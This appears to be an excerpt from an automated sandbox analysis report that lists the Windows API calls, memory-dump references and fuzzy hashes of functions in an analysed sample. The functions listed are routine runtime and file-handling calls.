                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EE6B06
                                                                              • GetLastError.KERNEL32 ref: 00EE6BA9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                              • String ID:
                                                                              • API String ID: 2112829910-0
                                                                              • Opcode ID: f6de2a76362459e6674f487be4439ad2d3e7328a87529a5cfeff927c501bcfa6
                                                                              • Instruction ID: 238b208e9f3d486cac1f4c16f2dc9eb60e931b2126768122cae46be5622e781e
                                                                              • Opcode Fuzzy Hash: f6de2a76362459e6674f487be4439ad2d3e7328a87529a5cfeff927c501bcfa6
                                                                              • Instruction Fuzzy Hash: 80D177B5D0028C9FCB15CFA9C8809EDBBB5FF18354F28516AE856FB351D630A942CB50
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustPointer
                                                                              • String ID:
                                                                              • API String ID: 1740715915-0
                                                                              • Opcode ID: fe03816a01f1d6e056e5528f6220af11cfe9bd5da1b6d01a329cbab0aacd3996
                                                                              • Instruction ID: 915e500150be6c32d253bda80971f729745bfaa07c46e7d7aa58738634030abe
                                                                              • Opcode Fuzzy Hash: fe03816a01f1d6e056e5528f6220af11cfe9bd5da1b6d01a329cbab0aacd3996
                                                                              • Instruction Fuzzy Hash: 5351AFB29012079FDB298F10D842BAA77A4EF44794F34592BE805A7391E731EC83DB90
                                                                              APIs
                                                                                • Part of subcall function 00EED831: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00EEB448,?,00000000,-00000008), ref: 00EED892
                                                                              • GetLastError.KERNEL32 ref: 00EEDC52
                                                                              • __dosmaperr.LIBCMT ref: 00EEDC59
                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00EEDC93
                                                                              • __dosmaperr.LIBCMT ref: 00EEDC9A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1913693674-0
                                                                              • Opcode ID: 3574885294bb9258916d03f4133b9e456fb0477ce51d22cf436b7ac4c7d3ac34
                                                                              • Instruction ID: cec71e29faec0d82f517f50b7da5397aee4e84a46cb4659e46ac7a30b8410757
                                                                              • Opcode Fuzzy Hash: 3574885294bb9258916d03f4133b9e456fb0477ce51d22cf436b7ac4c7d3ac34
                                                                              • Instruction Fuzzy Hash: 9021D33160828DAFDB20AF678C8196AF7ADEF413A87205519F919B7240DB70EC40CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e24be355c49e0f91cecaaf7d04524bdcff76da53c3cb7755202c8235bf70b811
                                                                              • Instruction ID: bb4ec423a2631dd5e4ae528d2cb51cef6d643e01046ef9cae4c11bbb0df83de4
                                                                              • Opcode Fuzzy Hash: e24be355c49e0f91cecaaf7d04524bdcff76da53c3cb7755202c8235bf70b811
                                                                              • Instruction Fuzzy Hash: 9A219F3160468DAFDB14AF738C9196AB7ADEF44369710651AFA18B7150EB30EC90CB90
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00EEEB7E
                                                                                • Part of subcall function 00EED831: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00EEB448,?,00000000,-00000008), ref: 00EED892
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EEEBB6
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EEEBD6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 158306478-0
                                                                              • Opcode ID: 705f863ba14745396aae6edad7335a7eb4fde3357974e1110fc9326cf8315bc9
                                                                              • Instruction ID: 5eed76295b57b307210937499a29467796cf44a87766b8fa45b4707262969493
                                                                              • Opcode Fuzzy Hash: 705f863ba14745396aae6edad7335a7eb4fde3357974e1110fc9326cf8315bc9
                                                                              • Instruction Fuzzy Hash: 6E11D2B190559DBE6B2527B79D8ECBF6AACEE843983602424F806F2202FE24CD059175
                                                                              APIs
                                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00EE0F0F,00000000,00000000,?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000), ref: 00EF5B1A
                                                                              • GetLastError.KERNEL32(?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000,?,?,?,00EE71D7,00000000), ref: 00EF5B26
                                                                                • Part of subcall function 00EF5AEC: CloseHandle.KERNEL32(FFFFFFFE,00EF5B36,?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000,?,?), ref: 00EF5AFC
                                                                              • ___initconout.LIBCMT ref: 00EF5B36
                                                                                • Part of subcall function 00EF5AAE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EF5ADD,00EF1EC8,?,?,00EE6BFD,?,00000000,00000000,?), ref: 00EF5AC1
                                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00EE0F0F,00000000,?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000,?), ref: 00EF5B4B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                              • String ID:
                                                                              • API String ID: 2744216297-0
                                                                              • Opcode ID: e4b5d3b7c5ec2161e24e050b49369b69e6220e58a72663815e34d93a2d80c993
                                                                              • Instruction ID: 139143ac3f5abbc85a705f13304b77b55e4a1699358e4b9d4b8a5418ae117af3
                                                                              • Opcode Fuzzy Hash: e4b5d3b7c5ec2161e24e050b49369b69e6220e58a72663815e34d93a2d80c993
                                                                              • Instruction Fuzzy Hash: DAF0F83660061ABFDF222F92DC049AE3F66FB583A0F004050FB0DA6530CA328964EB90
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00EE246D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__start
                                                                              • String ID: pow
                                                                              • API String ID: 3213639722-2276729525
                                                                              • Opcode ID: 0ed95419c2c377b14c9a891435751767721ee34e58b2c1cdace308a8968ae7f5
                                                                              • Instruction ID: b1d42bbb6030eeaec75d3bc9c1385e767c183d06ffeaf20450d87d9a9edf1d7a
                                                                              • Opcode Fuzzy Hash: 0ed95419c2c377b14c9a891435751767721ee34e58b2c1cdace308a8968ae7f5
                                                                              • Instruction Fuzzy Hash: C1517C6090C58E96CB117F17CE413BA27A8EB50714F307D6CF5F5B22E8EA358C89DA46
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(00000000,00EF41CC,00000000,cD,?,?,?,?,?,00EF5FF3,00000000,?,00EF41CC,?,00000000,cD), ref: 00EF6151
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00EF5FF3,00000000,?,00EF41CC,?,00000000,cD), ref: 00EF615B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID: cD
                                                                              • API String ID: 734332943-2029379377
                                                                              • Opcode ID: 943f67fb83efd2a6903a3574daccea18be5886facaaac347e98aec0c4e3aff07
                                                                              • Instruction ID: 59a3eddad2b7d444795b3a25167b195f83c6424f25f11c8210e3af9b4acbe807
                                                                              • Opcode Fuzzy Hash: 943f67fb83efd2a6903a3574daccea18be5886facaaac347e98aec0c4e3aff07
                                                                              • Instruction Fuzzy Hash: 7C51357190164DBBEB248F79CC85BBE7BB0AF04328F242219F605B61D2D730E990CB90
                                                                              APIs
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00EDC78F
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00EDC843
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 3480331319-1018135373
                                                                              • Opcode ID: 89cc6e187059e5daaf648e8737b51a4dc61ab7f7018fc1da129fc1e07d56643a
                                                                              • Instruction ID: 6837bb474e4d7b368b5d34fa8f9d0bdc3c2f20d7371f38c34c6c3f1e1ac0dafe
                                                                              • Opcode Fuzzy Hash: 89cc6e187059e5daaf648e8737b51a4dc61ab7f7018fc1da129fc1e07d56643a
                                                                              • Instruction Fuzzy Hash: AD419334A0020A9BCF14DF69C884A9EBBE5EF45354F249157E818BB392D771A906CF91
                                                                              APIs
                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00EDD087
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: EncodePointer
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 2118026453-2084237596
                                                                              • Opcode ID: c723e171b3e2a5eaebfe435ae1d8c45fb2e450ddbe92d5a06896c67c86153f94
                                                                              • Instruction ID: 1dae2e2787f96e998885cca8f760f665c837aa0dfec62a9b5a8ce49099ee493b
                                                                              • Opcode Fuzzy Hash: c723e171b3e2a5eaebfe435ae1d8c45fb2e450ddbe92d5a06896c67c86153f94
                                                                              • Instruction Fuzzy Hash: 5541487190020AEFCF16DF98CD81AAEBBB6FF48308F18919AF91477261D3359952DB50
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: char_traitscodecvt
                                                                              • String ID:
                                                                              • API String ID: 1910604377-3916222277
                                                                              • Opcode ID: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
                                                                              • Instruction ID: b9a60f9c758854e07df8bf06cda07a51aa645a9d1404563992b0a214d12e8add
                                                                              • Opcode Fuzzy Hash: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
                                                                              • Instruction Fuzzy Hash: 80315972914208EFCB04CB94C594AEEB7F5EF44304F24A19AD4127B341D730AE46EB90
                                                                              APIs
                                                                                • Part of subcall function 00ED72B0: _Max_value.LIBCPMTD ref: 00ED72DC
                                                                                • Part of subcall function 00ED72B0: _Min_value.LIBCPMTD ref: 00ED7302
                                                                              • _Min_value.LIBCPMTD ref: 00ED6928
                                                                              • allocator.LIBCONCRTD ref: 00ED693F
                                                                                • Part of subcall function 00ED7440: _Allocate.LIBCONCRTD ref: 00ED7454
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Min_value$AllocateMax_valueallocator
                                                                              • String ID: ;S
                                                                              • API String ID: 1398198560-3176674333
                                                                              • Opcode ID: 7d26b022a18fc2e0bf1e5838485797304f808408736efc7a268a1e21f31a8dbc
                                                                              • Instruction ID: 09354a87805d847a2f3d4adbb5635854a0814dfb1d805ce059d46a61b83e90f7
                                                                              • Opcode Fuzzy Hash: 7d26b022a18fc2e0bf1e5838485797304f808408736efc7a268a1e21f31a8dbc
                                                                              • Instruction Fuzzy Hash: A73137B5D04209AFCF04DFA8D8819EEBBB5FF48300F1085AAE445B7341D735AA46CBA1
                                                                              APIs
                                                                                • Part of subcall function 00ED72B0: _Max_value.LIBCPMTD ref: 00ED72DC
                                                                                • Part of subcall function 00ED72B0: _Min_value.LIBCPMTD ref: 00ED7302
                                                                              • allocator.LIBCONCRTD ref: 00ED8018
                                                                              • allocator.LIBCONCRTD ref: 00ED806D
                                                                                • Part of subcall function 00ED1550: std::_Xinvalid_argument.LIBCPMT ref: 00ED1558
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
                                                                              • String ID: Bg
                                                                              • API String ID: 3868691235-919853397
                                                                              • Opcode ID: 70ddc874a7278e7c469e8ddfaf7d9822cffd6cb4d35698cadb0e0e837ea844f0
                                                                              • Instruction ID: 4d5a64a181b70eb9d605d4320b3bc2416a5f07581fbae7faa3e629ff6f95d57b
                                                                              • Opcode Fuzzy Hash: 70ddc874a7278e7c469e8ddfaf7d9822cffd6cb4d35698cadb0e0e837ea844f0
                                                                              • Instruction Fuzzy Hash: E221D8B4A00108EFCB04EF98D9818AEB7F5EF88304B20919AE415B7355DB30AF41DB91